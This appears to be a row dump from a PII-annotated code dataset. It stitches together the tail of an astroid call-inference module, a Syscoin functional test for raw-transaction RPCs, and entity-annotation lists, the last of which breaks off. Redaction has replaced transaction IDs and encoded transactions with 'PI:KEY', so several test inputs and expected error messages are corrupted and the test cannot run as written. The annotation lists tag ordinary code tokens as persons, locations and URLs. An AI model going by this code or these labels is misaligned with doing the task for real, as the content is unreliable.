lineno=funcnode.args.lineno,
col_offset=funcnode.args.col_offset,
parent=funcnode.args,
)
args.postinit(vararg)
return iter((args,))
# Check if it's a default parameter.
try:
return funcnode.args.default_value(name).infer(context)
except exceptions.NoDefault:
pass
raise exceptions.InferenceError(
"No value found for argument {arg} to {func!r}",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
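# Illustrative usage sketch (assumptions, not part of astroid's own code):
# a CallSite is normally built from a parsed Call node, e.g.
#
#     import astroid
#     call = astroid.extract_node("divmod(7, 3)")  # yields the Call node
#     site = CallSite.from_call(call)
#     assert not site.has_invalid_arguments()
#     assert not site.has_invalid_keywords()
#
# extract_node is a real astroid helper, but this snippet is illustrative
# and untested against any specific astroid version.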
| 12,599 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015-2016'], ['DATE_TIME', '2018-2020'], ['PERSON', 'Claudiu Popa'], ['DATE_TIME', '2015-2016'], ['PERSON', 'Ceridwen'], ['PERSON', 'Nick Drozd'], ['PERSON', 'Anthony Sottile'], ['DATE_TIME', '2020'], ['PERSON', 'hippo91'], ['DATE_TIME', '2021'], ['PERSON', 'Pierre Sassoulas'], ['PERSON', 'callcontext = contextmod'], ['PERSON', 'kwonlyargs'], ['PERSON', 'boundnode'], ['PERSON', 'boundnode'], ['PERSON', 'lineno=funcnode.args.lineno'], ['PERSON', 'lineno=funcnode.args.lineno'], ['URL', 'https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html'], ['URL', 'https://github.com/PyCQA/astroid/blob/master/LICENSE'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'astroid.context.Ca'], ['URL', 'astroid.context.Co'], ['URL', 'astroid.context.Co'], ['URL', 'self.ar'], ['URL', 'callcontext.ar'], ['URL', 'callcontext.ke'], ['URL', 'self.ke'], ['URL', 'kwargs.it'], ['URL', 'astroid.context.Co'], ['URL', 'contextmod.In'], ['URL', 'contextmod.Ca'], ['URL', 'node.ar'], ['URL', 'node.ke'], ['URL', 'self.ke'], ['URL', 'contextmod.In'], ['URL', 'self.ar'], ['URL', 'value.in'], ['URL', 'exceptions.In'], ['URL', 'inferred.it'], ['URL', 'key.in'], ['URL', 'exceptions.In'], ['URL', 'nodes.Co'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'keywords.ad'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'contextmod.In'], ['URL', 'self.ar'], ['URL', 'nodes.St'], ['URL', 'arg.value.in'], ['URL', 'exceptions.In'], ['URL', 'exceptions.In'], ['URL', 'self.ke'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.va'], ['URL', 'funcnode.ar'], ['URL', 'exceptions.In'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.fi'], ['URL', 'arg.na'], ['URL', 'funcnode.args.kw'], ['URL', 'self.ke'], ['URL', 'arguments.it'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.ar'], ['URL', 'arg.na'], ['URL', 'arg.na'], ['URL', 'context.bo'], ['URL', 'context.bo'], ['URL', 'funcnode.parent.fr'], ['URL', 'nodes.Cl'], ['URL', 'cls.me'], ['URL', 'funcnode.parent.sc'], ['URL', 'boundnode.me'], ['URL', 'bases.In'], ['URL', 'boundnode.in'], ['URL', 'funcnode.args.kw'], ['URL', 'exceptions.In'], ['URL', 'self.ke'], ['URL', 'funcnode.args.li'], ['URL', 'funcnode.args.co'], ['URL', 'funcnode.ar'], ['URL', 'nodes.co'], ['URL', 'kwargs.it'], ['URL', 'funcnode.args.va'], ['URL', 'exceptions.In'], ['URL', 'funcnode.args.li'], ['URL', 'funcnode.args.co'], ['URL', 'funcnode.ar'], ['URL', 'funcnode.args.de'], ['URL', 'exceptions.No'], ['URL', 'exceptions.In']] |
76 | #!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the rawtransaction RPCs.
Test the following RPCs:
- createrawtransaction
- signrawtransactionwithwallet
- sendrawtransaction
- decoderawtransaction
- getrawtransaction
"""
from collections import OrderedDict
from decimal import Decimal
from io import BytesIO
from test_framework.messages import CTransaction, ToHex
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
find_vout_for_address,
hex_str_to_bytes,
)
class multidict(dict):
"""Dictionary that allows duplicate keys.
Constructed with a list of (key, value) tuples. When dumped by the json module,
will output invalid json with repeated keys, eg:
>>> json.dumps(multidict([(1,2),(1,2)]))
'{"1": 2, "1": 2}'
Used to test calls to rpc methods with repeated keys in the json object."""
def __init__(self, x):
dict.__init__(self, x)
self.x = x
def items(self):
return self.x
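# Illustrative aside (not in the upstream test): the docstring's claim can
# be checked directly, assuming json.dumps consults items() on dict
# subclasses and therefore emits every (key, value) pair in self.x:
#
#     import json
#     assert json.dumps(multidict([(1, 2), (1, 2)])) == '{"1": 2, "1": 2}'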
# Create one-input, one-output, no-fee transaction:
class RawTransactionsTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [
["-txindex"],
["-txindex"],
["-txindex"],
]
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
super().setup_network()
self.connect_nodes(0, 2)
def run_test(self):
self.log.info('prepare some coins for multiple *rawtransaction commands')
self.nodes[2].generate(1)
self.sync_all()
self.nodes[0].generate(101)
self.sync_all()
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.5)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.0)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),5.0)
self.sync_all()
self.nodes[0].generate(5)
self.sync_all()
self.log.info('Test getrawtransaction on genesis block coinbase returns an error')
block = self.nodes[0].getblock(self.nodes[0].getblockhash(0))
assert_raises_rpc_error(-5, "The genesis block coinbase is not considered an ordinary transaction", self.nodes[0].getrawtransaction, block['merkleroot'])
self.log.info('Check parameter types and required parameters of createrawtransaction')
# Test `createrawtransaction` required parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction)
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [])
# Test `createrawtransaction` invalid extra parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [], {}, 0, False, 'foo')
# Test `createrawtransaction` invalid `inputs`
txid = 'PI:KEY'
assert_raises_rpc_error(-3, "Expected type array", self.nodes[0].createrawtransaction, 'foo', {})
assert_raises_rpc_error(-1, "JSON value is not an object as expected", self.nodes[0].createrawtransaction, ['foo'], {})
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].createrawtransaction, [{}], {})
assert_raises_rpc_error(-8, "txid must be of length 64 (not 3, for 'foo')", self.nodes[0].createrawtransaction, [{'txid': 'foo'}], {})
assert_raises_rpc_error(-8, "txid must be hexadecimal string (not 'PI:KEY')", self.nodes[0].createrawtransaction, [{'txid': 'PI:KEY'}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': txid}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 'foo'}], {})
assert_raises_rpc_error(-8, "Invalid parameter, vout cannot be negative", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': -1}], {})
assert_raises_rpc_error(-8, "Invalid parameter, sequence number is out of range", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 0, 'sequence': -1}], {})
# Test `createrawtransaction` invalid `outputs`
address = self.nodes[0].getnewaddress()
address2 = self.nodes[0].getnewaddress()
assert_raises_rpc_error(-1, "JSON value is not an array as expected", self.nodes[0].createrawtransaction, [], 'foo')
self.nodes[0].createrawtransaction(inputs=[], outputs={}) # Should not throw for backwards compatibility
self.nodes[0].createrawtransaction(inputs=[], outputs=[])
assert_raises_rpc_error(-8, "Data must be hexadecimal string", self.nodes[0].createrawtransaction, [], {'data': 'foo'})
assert_raises_rpc_error(-5, "Invalid Syscoin address", self.nodes[0].createrawtransaction, [], {'foo': 0})
assert_raises_rpc_error(-3, "Invalid amount", self.nodes[0].createrawtransaction, [], {address: 'foo'})
assert_raises_rpc_error(-3, "Amount out of range", self.nodes[0].createrawtransaction, [], {address: -1})
assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)]))
assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], [{address: 1}, {address: 1}])
assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], [{"data": 'aa'}, {"data": "bb"}])
assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], multidict([("data", 'aa'), ("data", "bb")]))
assert_raises_rpc_error(-8, "Invalid parameter, key-value pair must contain exactly one key", self.nodes[0].createrawtransaction, [], [{'a': 1, 'b': 2}])
assert_raises_rpc_error(-8, "Invalid parameter, key-value pair not an object as expected", self.nodes[0].createrawtransaction, [], [['key-value pair1'], ['2']])
# Test `createrawtransaction` invalid `locktime`
assert_raises_rpc_error(-3, "Expected type number", self.nodes[0].createrawtransaction, [], {}, 'foo')
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, -1)
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, 4294967296)
# Test `createrawtransaction` invalid `replaceable`
assert_raises_rpc_error(-3, "Expected type bool", self.nodes[0].createrawtransaction, [], {}, 0, 'foo')
self.log.info('Check that createrawtransaction accepts an array and object as outputs')
tx = CTransaction()
# One output
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs={address: 99}))))
assert_equal(len(tx.vout), 1)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}]),
)
# Two outputs
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=OrderedDict([(address, 99), (address2, 99)])))))
assert_equal(len(tx.vout), 2)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}]),
)
# Multiple mixed outputs
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=multidict([(address, 99), (address2, 99), ('data', '99')])))))
assert_equal(len(tx.vout), 3)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}, {'data': '99'}]),
)
for type in ["bech32", "p2sh-segwit", "legacy"]:
addr = self.nodes[0].getnewaddress("", type)
addrinfo = self.nodes[0].getaddressinfo(addr)
pubkey = addrinfo["scriptPubKey"]
self.log.info('sendrawtransaction with missing prevtx info (%s)' %(type))
# Test `signrawtransactionwithwallet` invalid `prevtxs`
inputs = [ {'txid' : txid, 'vout' : 3, 'sequence' : 1000}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
prevtx = dict(txid=txid, scriptPubKey=pubkey, vout=3, amount=1)
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ["complete"]
if type == "legacy":
del prevtx["amount"]
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ["complete"]
if type != "legacy":
assert_raises_rpc_error(-3, "Missing amount", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": txid,
"scriptPubKey": pubkey,
"vout": 3,
}
])
assert_raises_rpc_error(-3, "Missing vout", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": txid,
"scriptPubKey": pubkey,
"amount": 1,
}
])
assert_raises_rpc_error(-3, "Missing txid", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"scriptPubKey": pubkey,
"vout": 3,
"amount": 1,
}
])
assert_raises_rpc_error(-3, "Missing scriptPubKey", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": txid,
"vout": 3,
"amount": 1
}
])
#########################################
# sendrawtransaction with missing input #
#########################################
self.log.info('sendrawtransaction with missing input')
inputs = [ {'txid' : "PI:KEY", 'vout' : 1}] #won't exist
outputs = { self.nodes[0].getnewaddress() : 4.998 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
rawtx = self.nodes[2].signrawtransactionwithwallet(rawtx)
# This will raise an exception since there are missing inputs
assert_raises_rpc_error(-25, "bad-txns-inputs-missingorspent", self.nodes[2].sendrawtransaction, rawtx['hex'])
#####################################
# getrawtransaction with block hash #
#####################################
# make a tx by sending then generate 2 blocks; block1 has the tx in it
tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1)
block1, block2 = self.nodes[2].generate(2)
self.sync_all()
# We should be able to get the raw transaction by providing the correct block
gottx = self.nodes[0].getrawtransaction(tx, True, block1)
assert_equal(gottx['txid'], tx)
assert_equal(gottx['in_active_chain'], True)
# We should have the 'in_active_chain' flag when we don't provide a block due to blockindexdb
gottx = self.nodes[0].getrawtransaction(tx, True)
assert_equal(gottx['txid'], tx)
# SYSCOIN
assert 'in_active_chain' in gottx
# We should not get the tx if we provide an unrelated block
assert_raises_rpc_error(-5, "No such transaction found", self.nodes[0].getrawtransaction, tx, True, block2)
# An invalid block hash should raise the correct errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].getrawtransaction, tx, True, True)
assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 6, for 'foobar')", self.nodes[0].getrawtransaction, tx, True, "foobar")
assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 8, for 'abcd1234')", self.nodes[0].getrawtransaction, tx, True, "abcd1234")
assert_raises_rpc_error(-8, "parameter 3 must be hexadecimal string (not 'ZZZ0000000000000000000000000000000000000000000000000000000000000')", self.nodes[0].getrawtransaction, tx, True, "ZZZ0000000000000000000000000000000000000000000000000000000000000")
assert_raises_rpc_error(-5, "Block hash not found", self.nodes[0].getrawtransaction, tx, True, "0000000000000000000000000000000000000000000000000000000000000000")
# Undo the blocks and check in_active_chain
self.nodes[0].invalidateblock(block1)
gottx = self.nodes[0].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
assert_equal(gottx['in_active_chain'], False)
self.nodes[0].reconsiderblock(block1)
assert_equal(self.nodes[0].getbestblockhash(), block2)
if not self.options.descriptors:
# The traditional multisig workflow does not work with descriptor wallets so these are legacy only.
# The multisig workflow with descriptor wallets uses PSBTs and is tested elsewhere, no need to do them here.
#########################
# RAW TX MULTISIG TESTS #
#########################
# 2of2 test
addr1 = self.nodes[2].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[2].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
# Tests for createmultisig and addmultisigaddress
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, ["01020304"])
self.nodes[0].createmultisig(2, [addr1Obj['pubkey'], addr2Obj['pubkey']]) # createmultisig can only take public keys
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 2, [addr1Obj['pubkey'], addr1]) # addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here.
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr1])['address']
#use balance deltas instead of absolute values
bal = self.nodes[2].getbalance()
# send 1.2 SYS to msig adr
txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal+Decimal('1.20000000')) #node2 has both keys of the 2of2 ms addr., tx should affect the balance
# 2of3 test from different nodes
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr3 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
addr3Obj = self.nodes[2].getaddressinfo(addr3)
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey']])['address']
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
#THIS IS AN INCOMPLETE FEATURE
#NODE2 HAS TWO OF THREE KEY AND THE FUNDS SHOULD BE SPENDABLE AND COUNT AT BALANCE CALCULATION
assert_equal(self.nodes[2].getbalance(), bal) #for now, assume the funds of a 2of3 multisig tx are not marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{ "txid" : txId, "vout" : vout['n'], "scriptPubKey" : vout['scriptPubKey']['hex'], "amount" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxPartialSigned['complete'], False) #node1 only has one key, can't comp. sign the tx
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxSigned['complete'], True) #node2 can sign the tx compl., own two of three keys
self.nodes[2].sendrawtransaction(rawTxSigned['hex'])
rawTx = self.nodes[0].decoderawtransaction(rawTxSigned['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# 2of2 test for combining transactions
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObjValid = self.nodes[2].getaddressinfo(mSigObj)
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx2 = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal) # the funds of a 2of2 multisig tx should not be marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx2 = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx2['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{ "txid" : txId, "vout" : vout['n'], "scriptPubKey" : vout['scriptPubKey']['hex'], "redeemScript" : mSigObjValid['hex'], "amount" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned1)
assert_equal(rawTxPartialSigned1['complete'], False) #node1 only has one key, can't comp. sign the tx
rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned2)
assert_equal(rawTxPartialSigned2['complete'], False) #node2 only has one key, can't comp. sign the tx
rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1['hex'], rawTxPartialSigned2['hex']])
self.log.debug(rawTxComb)
self.nodes[2].sendrawtransaction(rawTxComb)
rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# decoderawtransaction tests
# witness transaction
encrawtx = "PI:KEY"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True) # decode as witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # force decode as non-witness transaction
# non-witness transaction
encrawtx = "PI:KEY"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False) # decode as non-witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
# known ambiguous transaction in the chain (see https://github.com/bitcoin/bitcoin/issues/20579)
encrawtx = "PI:KEY"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx)
decrawtx_wit = self.nodes[0].decoderawtransaction(encrawtx, True)
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # fails to decode as non-witness transaction
assert_equal(decrawtx, decrawtx_wit) # the witness interpretation should be chosen
assert_equal(decrawtx['vin'][0]['coinbase'], "PI:KEY")
# Basic signrawtransaction test
addr = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr, 10)
self.nodes[0].generate(1)
self.sync_all()
vout = find_vout_for_address(self.nodes[1], txid, addr)
rawTx = self.nodes[1].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): 9.999})
rawTxSigned = self.nodes[1].signrawtransactionwithwallet(rawTx)
txId = self.nodes[1].sendrawtransaction(rawTxSigned['hex'])
self.nodes[0].generate(1)
self.sync_all()
# getrawtransaction tests
# 1. valid parameters - only supply txid
assert_equal(self.nodes[0].getrawtransaction(txId), rawTxSigned['hex'])
# 2. valid parameters - supply txid and 0 for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, 0), rawTxSigned['hex'])
# 3. valid parameters - supply txid and False for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, False), rawTxSigned['hex'])
# 4. valid parameters - supply txid and 1 for verbose.
# We only check the "hex" field of the output so we don't need to update this test every time the output format changes.
assert_equal(self.nodes[0].getrawtransaction(txId, 1)["hex"], rawTxSigned['hex'])
# 5. valid parameters - supply txid and True for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txId, True)["hex"], rawTxSigned['hex'])
# 6. invalid parameters - supply txid and string "Flase"
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txId, "Flase")
# 7. invalid parameters - supply txid and empty array
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txId, [])
# 8. invalid parameters - supply txid and empty dict
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txId, {})
inputs = [ {'txid' : "PI:KEY", 'vout' : 1, 'sequence' : 1000}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 1000)
# 9. invalid parameters - sequence number out of range
inputs = [ {'txid' : "PI:KEY", 'vout' : 1, 'sequence' : -1}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
# 10. invalid parameters - sequence number out of range
inputs = [ {'txid' : "PI:KEY", 'vout' : 1, 'sequence' : 4294967296}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
inputs = [ {'txid' : "PI:KEY", 'vout' : 1, 'sequence' : 4294967294}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 4294967294)
####################################
# TRANSACTION VERSION NUMBER TESTS #
####################################
# Test the minimum transaction version number that fits in a signed 32-bit integer.
# As transaction version is unsigned, this should convert to its unsigned equivalent.
tx = CTransaction()
tx.nVersion = -0x80000000
rawtx = ToHex(tx)
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x80000000)
# Test the maximum transaction version number that fits in a signed 32-bit integer.
tx = CTransaction()
tx.nVersion = 0x7fffffff
rawtx = ToHex(tx)
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x7fffffff)
self.log.info('sendrawtransaction/testmempoolaccept with maxfeerate')
# Test a transaction with a small fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{ "txid" : txId, "vout" : vout['n'] }]
# Fee 10,000 satoshis, (1 - (10000 sat * 0.00000001 SYS/sat)) = 0.9999
outputs = { self.nodes[0].getnewaddress() : Decimal("0.99990000") }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 10,000 satoshis, ~100 b transaction, fee rate should land around 100 sat/byte = 0.00100000 SYS/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']], 0.00001000)[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex'], 0.00001000)
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'])
# Test a transaction with a large fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{ "txid" : txId, "vout" : vout['n'] }]
# Fee 2,000,000 satoshis, (1 - (2000000 sat * 0.00000001 SYS/sat)) = 0.98
outputs = { self.nodes[0].getnewaddress() : Decimal("0.98000000") }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 2,000,000 satoshis, ~100 b transaction, fee rate should land around 20,000 sat/byte = 0.20000000 SYS/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex'])
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']], maxfeerate='0.20000000')[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'], maxfeerate='0.20000000')
if __name__ == '__main__':
RawTransactionsTest().main()
| 28,831 | [['MEDICAL_LICENSE', 'ZZ0000000'], ['MEDICAL_LICENSE', 'ZZ0000000'], ['DATE_TIME', '2014-2020'], ['NRP', 'OrderedDict'], ['PERSON', 'Constructed'], ['PERSON', 'json'], ['PERSON', 'json'], ['LOCATION', 'json'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'address2'], ['PERSON', 'locktime'], ['PERSON', 'locktime'], ['PERSON', 'address2'], ['PERSON', 'address2'], ['PERSON', 'tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress'], ['PERSON', 'self.sync_all'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['LOCATION', 'tx'], ['PERSON', 'mSigObj = self.nodes[2].addmultisigaddress(2'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['LOCATION', 'addr.'], ['PERSON', 'addr3'], ['PERSON', 'addr1Obj = self.nodes[1].getaddressinfo(addr1'], ['PERSON', 'addr3Obj'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 'addr1Obj = self.nodes[1].getaddressinfo(addr1'], ['PERSON', 'self.sync_all'], ['PERSON', 'self.sync_all'], ['PERSON', 